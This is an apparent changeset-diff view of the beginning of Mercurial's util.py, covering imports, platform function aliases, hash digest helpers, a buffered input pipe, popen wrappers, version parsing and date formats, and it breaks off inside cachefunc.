1998 'git': gitsubrepo,
1995 }
1999 }
@@ -1,3719 +1,3720 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import datetime
23 import datetime
24 import errno
24 import errno
25 import gc
25 import gc
26 import hashlib
26 import hashlib
27 import imp
27 import imp
28 import os
28 import os
29 import platform as pyplatform
29 import platform as pyplatform
30 import re as remod
30 import re as remod
31 import shutil
31 import shutil
32 import signal
32 import signal
33 import socket
33 import socket
34 import stat
34 import stat
35 import string
35 import string
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import textwrap
39 import textwrap
40 import time
40 import time
41 import traceback
41 import traceback
42 import warnings
42 import warnings
43 import zlib
43 import zlib
44
44
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 base85 = policy.importmod(r'base85')
53 base85 = policy.importmod(r'base85')
54 osutil = policy.importmod(r'osutil')
54 osutil = policy.importmod(r'osutil')
55 parsers = policy.importmod(r'parsers')
55 parsers = policy.importmod(r'parsers')
56
56
57 b85decode = base85.b85decode
57 b85decode = base85.b85decode
58 b85encode = base85.b85encode
58 b85encode = base85.b85encode
59
59
60 cookielib = pycompat.cookielib
60 cookielib = pycompat.cookielib
61 empty = pycompat.empty
61 empty = pycompat.empty
62 httplib = pycompat.httplib
62 httplib = pycompat.httplib
63 httpserver = pycompat.httpserver
63 httpserver = pycompat.httpserver
64 pickle = pycompat.pickle
64 pickle = pycompat.pickle
65 queue = pycompat.queue
65 queue = pycompat.queue
66 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
67 stderr = pycompat.stderr
67 stderr = pycompat.stderr
68 stdin = pycompat.stdin
68 stdin = pycompat.stdin
69 stdout = pycompat.stdout
69 stdout = pycompat.stdout
70 stringio = pycompat.stringio
70 stringio = pycompat.stringio
71 urlerr = pycompat.urlerr
71 urlerr = pycompat.urlerr
72 urlreq = pycompat.urlreq
72 urlreq = pycompat.urlreq
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 # workaround for win32mbcs
75 # workaround for win32mbcs
76 _filenamebytestr = pycompat.bytestr
76 _filenamebytestr = pycompat.bytestr
77
77
78 def isatty(fp):
78 def isatty(fp):
79 try:
79 try:
80 return fp.isatty()
80 return fp.isatty()
81 except AttributeError:
81 except AttributeError:
82 return False
82 return False
83
83
84 # glibc determines buffering on first write to stdout - if we replace a TTY
84 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # buffering
86 # buffering
87 if isatty(stdout):
87 if isatty(stdout):
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89
89
90 if pycompat.osname == 'nt':
90 if pycompat.osname == 'nt':
91 from . import windows as platform
91 from . import windows as platform
92 stdout = platform.winstdout(stdout)
92 stdout = platform.winstdout(stdout)
93 else:
93 else:
94 from . import posix as platform
94 from . import posix as platform
95
95
96 _ = i18n._
96 _ = i18n._
97
97
98 bindunixsocket = platform.bindunixsocket
98 bindunixsocket = platform.bindunixsocket
99 cachestat = platform.cachestat
99 cachestat = platform.cachestat
100 checkexec = platform.checkexec
100 checkexec = platform.checkexec
101 checklink = platform.checklink
101 checklink = platform.checklink
102 copymode = platform.copymode
102 copymode = platform.copymode
103 executablepath = platform.executablepath
103 executablepath = platform.executablepath
104 expandglobs = platform.expandglobs
104 expandglobs = platform.expandglobs
105 explainexit = platform.explainexit
105 explainexit = platform.explainexit
106 findexe = platform.findexe
106 findexe = platform.findexe
107 gethgcmd = platform.gethgcmd
107 gethgcmd = platform.gethgcmd
108 getuser = platform.getuser
108 getuser = platform.getuser
109 getpid = os.getpid
109 getpid = os.getpid
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 hidewindow = platform.hidewindow
112 hidewindow = platform.hidewindow
113 isexec = platform.isexec
113 isexec = platform.isexec
114 isowner = platform.isowner
114 isowner = platform.isowner
115 listdir = osutil.listdir
115 listdir = osutil.listdir
116 localpath = platform.localpath
116 localpath = platform.localpath
117 lookupreg = platform.lookupreg
117 lookupreg = platform.lookupreg
118 makedir = platform.makedir
118 makedir = platform.makedir
119 nlinks = platform.nlinks
119 nlinks = platform.nlinks
120 normpath = platform.normpath
120 normpath = platform.normpath
121 normcase = platform.normcase
121 normcase = platform.normcase
122 normcasespec = platform.normcasespec
122 normcasespec = platform.normcasespec
123 normcasefallback = platform.normcasefallback
123 normcasefallback = platform.normcasefallback
124 openhardlinks = platform.openhardlinks
124 openhardlinks = platform.openhardlinks
125 oslink = platform.oslink
125 oslink = platform.oslink
126 parsepatchoutput = platform.parsepatchoutput
126 parsepatchoutput = platform.parsepatchoutput
127 pconvert = platform.pconvert
127 pconvert = platform.pconvert
128 poll = platform.poll
128 poll = platform.poll
129 popen = platform.popen
129 popen = platform.popen
130 posixfile = platform.posixfile
130 posixfile = platform.posixfile
131 quotecommand = platform.quotecommand
131 quotecommand = platform.quotecommand
132 readpipe = platform.readpipe
132 readpipe = platform.readpipe
133 rename = platform.rename
133 rename = platform.rename
134 removedirs = platform.removedirs
134 removedirs = platform.removedirs
135 samedevice = platform.samedevice
135 samedevice = platform.samedevice
136 samefile = platform.samefile
136 samefile = platform.samefile
137 samestat = platform.samestat
137 samestat = platform.samestat
138 setbinary = platform.setbinary
138 setbinary = platform.setbinary
139 setflags = platform.setflags
139 setflags = platform.setflags
140 setsignalhandler = platform.setsignalhandler
140 setsignalhandler = platform.setsignalhandler
141 shellquote = platform.shellquote
141 shellquote = platform.shellquote
142 spawndetached = platform.spawndetached
142 spawndetached = platform.spawndetached
143 split = platform.split
143 split = platform.split
144 sshargs = platform.sshargs
144 sshargs = platform.sshargs
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statisexec = platform.statisexec
146 statisexec = platform.statisexec
147 statislink = platform.statislink
147 statislink = platform.statislink
148 testpid = platform.testpid
148 testpid = platform.testpid
149 umask = platform.umask
149 umask = platform.umask
150 unlink = platform.unlink
150 unlink = platform.unlink
151 username = platform.username
151 username = platform.username
152
152
153 try:
153 try:
154 recvfds = osutil.recvfds
154 recvfds = osutil.recvfds
155 except AttributeError:
155 except AttributeError:
156 pass
156 pass
157 try:
157 try:
158 setprocname = osutil.setprocname
158 setprocname = osutil.setprocname
159 except AttributeError:
159 except AttributeError:
160 pass
160 pass
161
161
162 # Python compatibility
162 # Python compatibility
163
163
164 _notset = object()
164 _notset = object()
165
165
166 # disable Python's problematic floating point timestamps (issue4836)
166 # disable Python's problematic floating point timestamps (issue4836)
167 # (Python hypocritically says you shouldn't change this behavior in
167 # (Python hypocritically says you shouldn't change this behavior in
168 # libraries, and sure enough Mercurial is not a library.)
168 # libraries, and sure enough Mercurial is not a library.)
169 os.stat_float_times(False)
169 os.stat_float_times(False)
170
170
171 def safehasattr(thing, attr):
171 def safehasattr(thing, attr):
172 return getattr(thing, attr, _notset) is not _notset
172 return getattr(thing, attr, _notset) is not _notset
173
173
174 def bitsfrom(container):
174 def bitsfrom(container):
175 bits = 0
175 bits = 0
176 for bit in container:
176 for bit in container:
177 bits |= bit
177 bits |= bit
178 return bits
178 return bits
179
179
180 # python 2.6 still have deprecation warning enabled by default. We do not want
180 # python 2.6 still have deprecation warning enabled by default. We do not want
181 # to display anything to standard user so detect if we are running test and
181 # to display anything to standard user so detect if we are running test and
182 # only use python deprecation warning in this case.
182 # only use python deprecation warning in this case.
183 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
183 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
184 if _dowarn:
184 if _dowarn:
185 # explicitly unfilter our warning for python 2.7
185 # explicitly unfilter our warning for python 2.7
186 #
186 #
187 # The option of setting PYTHONWARNINGS in the test runner was investigated.
187 # The option of setting PYTHONWARNINGS in the test runner was investigated.
188 # However, module name set through PYTHONWARNINGS was exactly matched, so
188 # However, module name set through PYTHONWARNINGS was exactly matched, so
189 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
189 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
190 # makes the whole PYTHONWARNINGS thing useless for our usecase.
190 # makes the whole PYTHONWARNINGS thing useless for our usecase.
191 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
191 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
194
194
195 def nouideprecwarn(msg, version, stacklevel=1):
195 def nouideprecwarn(msg, version, stacklevel=1):
196 """Issue an python native deprecation warning
196 """Issue an python native deprecation warning
197
197
198 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
198 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
199 """
199 """
200 if _dowarn:
200 if _dowarn:
201 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
201 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
202 " update your code.)") % version
202 " update your code.)") % version
203 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
203 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
204
204
205 DIGESTS = {
205 DIGESTS = {
206 'md5': hashlib.md5,
206 'md5': hashlib.md5,
207 'sha1': hashlib.sha1,
207 'sha1': hashlib.sha1,
208 'sha512': hashlib.sha512,
208 'sha512': hashlib.sha512,
209 }
209 }
210 # List of digest types from strongest to weakest
210 # List of digest types from strongest to weakest
211 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
211 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
212
212
213 for k in DIGESTS_BY_STRENGTH:
213 for k in DIGESTS_BY_STRENGTH:
214 assert k in DIGESTS
214 assert k in DIGESTS
215
215
216 class digester(object):
216 class digester(object):
217 """helper to compute digests.
217 """helper to compute digests.
218
218
219 This helper can be used to compute one or more digests given their name.
219 This helper can be used to compute one or more digests given their name.
220
220
221 >>> d = digester(['md5', 'sha1'])
221 >>> d = digester(['md5', 'sha1'])
222 >>> d.update('foo')
222 >>> d.update('foo')
223 >>> [k for k in sorted(d)]
223 >>> [k for k in sorted(d)]
224 ['md5', 'sha1']
224 ['md5', 'sha1']
225 >>> d['md5']
225 >>> d['md5']
226 'acbd18db4cc2f85cedef654fccc4a4d8'
226 'acbd18db4cc2f85cedef654fccc4a4d8'
227 >>> d['sha1']
227 >>> d['sha1']
228 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
228 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
229 >>> digester.preferred(['md5', 'sha1'])
229 >>> digester.preferred(['md5', 'sha1'])
230 'sha1'
230 'sha1'
231 """
231 """
232
232
233 def __init__(self, digests, s=''):
233 def __init__(self, digests, s=''):
234 self._hashes = {}
234 self._hashes = {}
235 for k in digests:
235 for k in digests:
236 if k not in DIGESTS:
236 if k not in DIGESTS:
237 raise Abort(_('unknown digest type: %s') % k)
237 raise Abort(_('unknown digest type: %s') % k)
238 self._hashes[k] = DIGESTS[k]()
238 self._hashes[k] = DIGESTS[k]()
239 if s:
239 if s:
240 self.update(s)
240 self.update(s)
241
241
242 def update(self, data):
242 def update(self, data):
243 for h in self._hashes.values():
243 for h in self._hashes.values():
244 h.update(data)
244 h.update(data)
245
245
246 def __getitem__(self, key):
246 def __getitem__(self, key):
247 if key not in DIGESTS:
247 if key not in DIGESTS:
248 raise Abort(_('unknown digest type: %s') % k)
248 raise Abort(_('unknown digest type: %s') % k)
249 return self._hashes[key].hexdigest()
249 return self._hashes[key].hexdigest()
250
250
251 def __iter__(self):
251 def __iter__(self):
252 return iter(self._hashes)
252 return iter(self._hashes)
253
253
254 @staticmethod
254 @staticmethod
255 def preferred(supported):
255 def preferred(supported):
256 """returns the strongest digest type in both supported and DIGESTS."""
256 """returns the strongest digest type in both supported and DIGESTS."""
257
257
258 for k in DIGESTS_BY_STRENGTH:
258 for k in DIGESTS_BY_STRENGTH:
259 if k in supported:
259 if k in supported:
260 return k
260 return k
261 return None
261 return None
262
262
263 class digestchecker(object):
263 class digestchecker(object):
264 """file handle wrapper that additionally checks content against a given
264 """file handle wrapper that additionally checks content against a given
265 size and digests.
265 size and digests.
266
266
267 d = digestchecker(fh, size, {'md5': '...'})
267 d = digestchecker(fh, size, {'md5': '...'})
268
268
269 When multiple digests are given, all of them are validated.
269 When multiple digests are given, all of them are validated.
270 """
270 """
271
271
272 def __init__(self, fh, size, digests):
272 def __init__(self, fh, size, digests):
273 self._fh = fh
273 self._fh = fh
274 self._size = size
274 self._size = size
275 self._got = 0
275 self._got = 0
276 self._digests = dict(digests)
276 self._digests = dict(digests)
277 self._digester = digester(self._digests.keys())
277 self._digester = digester(self._digests.keys())
278
278
279 def read(self, length=-1):
279 def read(self, length=-1):
280 content = self._fh.read(length)
280 content = self._fh.read(length)
281 self._digester.update(content)
281 self._digester.update(content)
282 self._got += len(content)
282 self._got += len(content)
283 return content
283 return content
284
284
285 def validate(self):
285 def validate(self):
286 if self._size != self._got:
286 if self._size != self._got:
287 raise Abort(_('size mismatch: expected %d, got %d') %
287 raise Abort(_('size mismatch: expected %d, got %d') %
288 (self._size, self._got))
288 (self._size, self._got))
289 for k, v in self._digests.items():
289 for k, v in self._digests.items():
290 if v != self._digester[k]:
290 if v != self._digester[k]:
291 # i18n: first parameter is a digest name
291 # i18n: first parameter is a digest name
292 raise Abort(_('%s mismatch: expected %s, got %s') %
292 raise Abort(_('%s mismatch: expected %s, got %s') %
293 (k, v, self._digester[k]))
293 (k, v, self._digester[k]))
294
294
295 try:
295 try:
296 buffer = buffer
296 buffer = buffer
297 except NameError:
297 except NameError:
298 def buffer(sliceable, offset=0, length=None):
298 def buffer(sliceable, offset=0, length=None):
299 if length is not None:
299 if length is not None:
300 return memoryview(sliceable)[offset:offset + length]
300 return memoryview(sliceable)[offset:offset + length]
301 return memoryview(sliceable)[offset:]
301 return memoryview(sliceable)[offset:]
302
302
303 closefds = pycompat.osname == 'posix'
303 closefds = pycompat.osname == 'posix'
304
304
305 _chunksize = 4096
305 _chunksize = 4096
306
306
307 class bufferedinputpipe(object):
307 class bufferedinputpipe(object):
308 """a manually buffered input pipe
308 """a manually buffered input pipe
309
309
310 Python will not let us use buffered IO and lazy reading with 'polling' at
310 Python will not let us use buffered IO and lazy reading with 'polling' at
311 the same time. We cannot probe the buffer state and select will not detect
311 the same time. We cannot probe the buffer state and select will not detect
312 that data are ready to read if they are already buffered.
312 that data are ready to read if they are already buffered.
313
313
314 This class let us work around that by implementing its own buffering
314 This class let us work around that by implementing its own buffering
315 (allowing efficient readline) while offering a way to know if the buffer is
315 (allowing efficient readline) while offering a way to know if the buffer is
316 empty from the output (allowing collaboration of the buffer with polling).
316 empty from the output (allowing collaboration of the buffer with polling).
317
317
318 This class lives in the 'util' module because it makes use of the 'os'
318 This class lives in the 'util' module because it makes use of the 'os'
319 module from the python stdlib.
319 module from the python stdlib.
320 """
320 """
321
321
322 def __init__(self, input):
322 def __init__(self, input):
323 self._input = input
323 self._input = input
324 self._buffer = []
324 self._buffer = []
325 self._eof = False
325 self._eof = False
326 self._lenbuf = 0
326 self._lenbuf = 0
327
327
328 @property
328 @property
329 def hasbuffer(self):
329 def hasbuffer(self):
330 """True is any data is currently buffered
330 """True is any data is currently buffered
331
331
332 This will be used externally a pre-step for polling IO. If there is
332 This will be used externally a pre-step for polling IO. If there is
333 already data then no polling should be set in place."""
333 already data then no polling should be set in place."""
334 return bool(self._buffer)
334 return bool(self._buffer)
335
335
336 @property
336 @property
337 def closed(self):
337 def closed(self):
338 return self._input.closed
338 return self._input.closed
339
339
340 def fileno(self):
340 def fileno(self):
341 return self._input.fileno()
341 return self._input.fileno()
342
342
343 def close(self):
343 def close(self):
344 return self._input.close()
344 return self._input.close()
345
345
346 def read(self, size):
346 def read(self, size):
347 while (not self._eof) and (self._lenbuf < size):
347 while (not self._eof) and (self._lenbuf < size):
348 self._fillbuffer()
348 self._fillbuffer()
349 return self._frombuffer(size)
349 return self._frombuffer(size)
350
350
351 def readline(self, *args, **kwargs):
351 def readline(self, *args, **kwargs):
352 if 1 < len(self._buffer):
352 if 1 < len(self._buffer):
353 # this should not happen because both read and readline end with a
353 # this should not happen because both read and readline end with a
354 # _frombuffer call that collapse it.
354 # _frombuffer call that collapse it.
355 self._buffer = [''.join(self._buffer)]
355 self._buffer = [''.join(self._buffer)]
356 self._lenbuf = len(self._buffer[0])
356 self._lenbuf = len(self._buffer[0])
357 lfi = -1
357 lfi = -1
358 if self._buffer:
358 if self._buffer:
359 lfi = self._buffer[-1].find('\n')
359 lfi = self._buffer[-1].find('\n')
360 while (not self._eof) and lfi < 0:
360 while (not self._eof) and lfi < 0:
361 self._fillbuffer()
361 self._fillbuffer()
362 if self._buffer:
362 if self._buffer:
363 lfi = self._buffer[-1].find('\n')
363 lfi = self._buffer[-1].find('\n')
364 size = lfi + 1
364 size = lfi + 1
365 if lfi < 0: # end of file
365 if lfi < 0: # end of file
366 size = self._lenbuf
366 size = self._lenbuf
367 elif 1 < len(self._buffer):
367 elif 1 < len(self._buffer):
368 # we need to take previous chunks into account
368 # we need to take previous chunks into account
369 size += self._lenbuf - len(self._buffer[-1])
369 size += self._lenbuf - len(self._buffer[-1])
370 return self._frombuffer(size)
370 return self._frombuffer(size)
371
371
372 def _frombuffer(self, size):
372 def _frombuffer(self, size):
373 """return at most 'size' data from the buffer
373 """return at most 'size' data from the buffer
374
374
375 The data are removed from the buffer."""
375 The data are removed from the buffer."""
376 if size == 0 or not self._buffer:
376 if size == 0 or not self._buffer:
377 return ''
377 return ''
378 buf = self._buffer[0]
378 buf = self._buffer[0]
379 if 1 < len(self._buffer):
379 if 1 < len(self._buffer):
380 buf = ''.join(self._buffer)
380 buf = ''.join(self._buffer)
381
381
382 data = buf[:size]
382 data = buf[:size]
383 buf = buf[len(data):]
383 buf = buf[len(data):]
384 if buf:
384 if buf:
385 self._buffer = [buf]
385 self._buffer = [buf]
386 self._lenbuf = len(buf)
386 self._lenbuf = len(buf)
387 else:
387 else:
388 self._buffer = []
388 self._buffer = []
389 self._lenbuf = 0
389 self._lenbuf = 0
390 return data
390 return data
391
391
392 def _fillbuffer(self):
392 def _fillbuffer(self):
393 """read data to the buffer"""
393 """read data to the buffer"""
394 data = os.read(self._input.fileno(), _chunksize)
394 data = os.read(self._input.fileno(), _chunksize)
395 if not data:
395 if not data:
396 self._eof = True
396 self._eof = True
397 else:
397 else:
398 self._lenbuf += len(data)
398 self._lenbuf += len(data)
399 self._buffer.append(data)
399 self._buffer.append(data)
400
400
401 def popen2(cmd, env=None, newlines=False):
401 def popen2(cmd, env=None, newlines=False):
402 # Setting bufsize to -1 lets the system decide the buffer size.
402 # Setting bufsize to -1 lets the system decide the buffer size.
403 # The default for bufsize is 0, meaning unbuffered. This leads to
403 # The default for bufsize is 0, meaning unbuffered. This leads to
404 # poor performance on Mac OS X: http://bugs.python.org/issue4194
404 # poor performance on Mac OS X: http://bugs.python.org/issue4194
405 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
405 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
406 close_fds=closefds,
406 close_fds=closefds,
407 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
407 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
408 universal_newlines=newlines,
408 universal_newlines=newlines,
409 env=env)
409 env=env)
410 return p.stdin, p.stdout
410 return p.stdin, p.stdout
411
411
412 def popen3(cmd, env=None, newlines=False):
412 def popen3(cmd, env=None, newlines=False):
413 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
413 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
414 return stdin, stdout, stderr
414 return stdin, stdout, stderr
415
415
416 def popen4(cmd, env=None, newlines=False, bufsize=-1):
416 def popen4(cmd, env=None, newlines=False, bufsize=-1):
417 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
417 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
418 close_fds=closefds,
418 close_fds=closefds,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 stderr=subprocess.PIPE,
420 stderr=subprocess.PIPE,
421 universal_newlines=newlines,
421 universal_newlines=newlines,
422 env=env)
422 env=env)
423 return p.stdin, p.stdout, p.stderr, p
423 return p.stdin, p.stdout, p.stderr, p
424
424
425 def version():
425 def version():
426 """Return version information if available."""
426 """Return version information if available."""
427 try:
427 try:
428 from . import __version__
428 from . import __version__
429 return __version__.version
429 return __version__.version
430 except ImportError:
430 except ImportError:
431 return 'unknown'
431 return 'unknown'
432
432
433 def versiontuple(v=None, n=4):
433 def versiontuple(v=None, n=4):
434 """Parses a Mercurial version string into an N-tuple.
434 """Parses a Mercurial version string into an N-tuple.
435
435
436 The version string to be parsed is specified with the ``v`` argument.
436 The version string to be parsed is specified with the ``v`` argument.
437 If it isn't defined, the current Mercurial version string will be parsed.
437 If it isn't defined, the current Mercurial version string will be parsed.
438
438
439 ``n`` can be 2, 3, or 4. Here is how some version strings map to
439 ``n`` can be 2, 3, or 4. Here is how some version strings map to
440 returned values:
440 returned values:
441
441
442 >>> v = '3.6.1+190-df9b73d2d444'
442 >>> v = '3.6.1+190-df9b73d2d444'
443 >>> versiontuple(v, 2)
443 >>> versiontuple(v, 2)
444 (3, 6)
444 (3, 6)
445 >>> versiontuple(v, 3)
445 >>> versiontuple(v, 3)
446 (3, 6, 1)
446 (3, 6, 1)
447 >>> versiontuple(v, 4)
447 >>> versiontuple(v, 4)
448 (3, 6, 1, '190-df9b73d2d444')
448 (3, 6, 1, '190-df9b73d2d444')
449
449
450 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
450 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
451 (3, 6, 1, '190-df9b73d2d444+20151118')
451 (3, 6, 1, '190-df9b73d2d444+20151118')
452
452
453 >>> v = '3.6'
453 >>> v = '3.6'
454 >>> versiontuple(v, 2)
454 >>> versiontuple(v, 2)
455 (3, 6)
455 (3, 6)
456 >>> versiontuple(v, 3)
456 >>> versiontuple(v, 3)
457 (3, 6, None)
457 (3, 6, None)
458 >>> versiontuple(v, 4)
458 >>> versiontuple(v, 4)
459 (3, 6, None, None)
459 (3, 6, None, None)
460
460
461 >>> v = '3.9-rc'
461 >>> v = '3.9-rc'
462 >>> versiontuple(v, 2)
462 >>> versiontuple(v, 2)
463 (3, 9)
463 (3, 9)
464 >>> versiontuple(v, 3)
464 >>> versiontuple(v, 3)
465 (3, 9, None)
465 (3, 9, None)
466 >>> versiontuple(v, 4)
466 >>> versiontuple(v, 4)
467 (3, 9, None, 'rc')
467 (3, 9, None, 'rc')
468
468
469 >>> v = '3.9-rc+2-02a8fea4289b'
469 >>> v = '3.9-rc+2-02a8fea4289b'
470 >>> versiontuple(v, 2)
470 >>> versiontuple(v, 2)
471 (3, 9)
471 (3, 9)
472 >>> versiontuple(v, 3)
472 >>> versiontuple(v, 3)
473 (3, 9, None)
473 (3, 9, None)
474 >>> versiontuple(v, 4)
474 >>> versiontuple(v, 4)
475 (3, 9, None, 'rc+2-02a8fea4289b')
475 (3, 9, None, 'rc+2-02a8fea4289b')
476 """
476 """
477 if not v:
477 if not v:
478 v = version()
478 v = version()
479 parts = remod.split('[\+-]', v, 1)
479 parts = remod.split('[\+-]', v, 1)
480 if len(parts) == 1:
480 if len(parts) == 1:
481 vparts, extra = parts[0], None
481 vparts, extra = parts[0], None
482 else:
482 else:
483 vparts, extra = parts
483 vparts, extra = parts
484
484
485 vints = []
485 vints = []
486 for i in vparts.split('.'):
486 for i in vparts.split('.'):
487 try:
487 try:
488 vints.append(int(i))
488 vints.append(int(i))
489 except ValueError:
489 except ValueError:
490 break
490 break
491 # (3, 6) -> (3, 6, None)
491 # (3, 6) -> (3, 6, None)
492 while len(vints) < 3:
492 while len(vints) < 3:
493 vints.append(None)
493 vints.append(None)
494
494
495 if n == 2:
495 if n == 2:
496 return (vints[0], vints[1])
496 return (vints[0], vints[1])
497 if n == 3:
497 if n == 3:
498 return (vints[0], vints[1], vints[2])
498 return (vints[0], vints[1], vints[2])
499 if n == 4:
499 if n == 4:
500 return (vints[0], vints[1], vints[2], extra)
500 return (vints[0], vints[1], vints[2], extra)
501
501
502 # used by parsedate
502 # used by parsedate
503 defaultdateformats = (
503 defaultdateformats = (
504 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
504 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
505 '%Y-%m-%dT%H:%M', # without seconds
505 '%Y-%m-%dT%H:%M', # without seconds
506 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
506 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
507 '%Y-%m-%dT%H%M', # without seconds
507 '%Y-%m-%dT%H%M', # without seconds
508 '%Y-%m-%d %H:%M:%S', # our common legal variant
508 '%Y-%m-%d %H:%M:%S', # our common legal variant
509 '%Y-%m-%d %H:%M', # without seconds
509 '%Y-%m-%d %H:%M', # without seconds
510 '%Y-%m-%d %H%M%S', # without :
510 '%Y-%m-%d %H%M%S', # without :
511 '%Y-%m-%d %H%M', # without seconds
511 '%Y-%m-%d %H%M', # without seconds
512 '%Y-%m-%d %I:%M:%S%p',
512 '%Y-%m-%d %I:%M:%S%p',
513 '%Y-%m-%d %H:%M',
513 '%Y-%m-%d %H:%M',
514 '%Y-%m-%d %I:%M%p',
514 '%Y-%m-%d %I:%M%p',
515 '%Y-%m-%d',
515 '%Y-%m-%d',
516 '%m-%d',
516 '%m-%d',
517 '%m/%d',
517 '%m/%d',
518 '%m/%d/%y',
518 '%m/%d/%y',
519 '%m/%d/%Y',
519 '%m/%d/%Y',
520 '%a %b %d %H:%M:%S %Y',
520 '%a %b %d %H:%M:%S %Y',
521 '%a %b %d %I:%M:%S%p %Y',
521 '%a %b %d %I:%M:%S%p %Y',
522 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
522 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
523 '%b %d %H:%M:%S %Y',
523 '%b %d %H:%M:%S %Y',
524 '%b %d %I:%M:%S%p %Y',
524 '%b %d %I:%M:%S%p %Y',
525 '%b %d %H:%M:%S',
525 '%b %d %H:%M:%S',
526 '%b %d %I:%M:%S%p',
526 '%b %d %I:%M:%S%p',
527 '%b %d %H:%M',
527 '%b %d %H:%M',
528 '%b %d %I:%M%p',
528 '%b %d %I:%M%p',
529 '%b %d %Y',
529 '%b %d %Y',
530 '%b %d',
530 '%b %d',
531 '%H:%M:%S',
531 '%H:%M:%S',
532 '%I:%M:%S%p',
532 '%I:%M:%S%p',
533 '%H:%M',
533 '%H:%M',
534 '%I:%M%p',
534 '%I:%M%p',
535 )
535 )
536
536
537 extendeddateformats = defaultdateformats + (
537 extendeddateformats = defaultdateformats + (
538 "%Y",
538 "%Y",
539 "%Y-%m",
539 "%Y-%m",
540 "%b",
540 "%b",
541 "%b %Y",
541 "%b %Y",
542 )
542 )
543
543
544 def cachefunc(func):
544 def cachefunc(func):
545 '''cache the result of function calls'''
545 '''cache the result of function calls'''
546 # XXX doesn't handle keywords args
546 # XXX doesn't handle keywords args
547 if func.__code__.co_argcount == 0:
547 if func.__code__.co_argcount == 0:
548 cache = []
548 cache = []
549 def f():
549 def f():
550 if len(cache) == 0:
550 if len(cache) == 0:
551 cache.append(func())
551 cache.append(func())
552 return cache[0]
552 return cache[0]
553 return f
553 return f
554 cache = {}
554 cache = {}
555 if func.__code__.co_argcount == 1:
555 if func.__code__.co_argcount == 1:
556 # we gain a small amount of time because
556 # we gain a small amount of time because
557 # we don't need to pack/unpack the list
557 # we don't need to pack/unpack the list
558 def f(arg):
558 def f(arg):
559 if arg not in cache:
559 if arg not in cache:
560 cache[arg] = func(arg)
560 cache[arg] = func(arg)
561 return cache[arg]
561 return cache[arg]
562 else:
562 else:
563 def f(*args):
563 def f(*args):
564 if args not in cache:
564 if args not in cache:
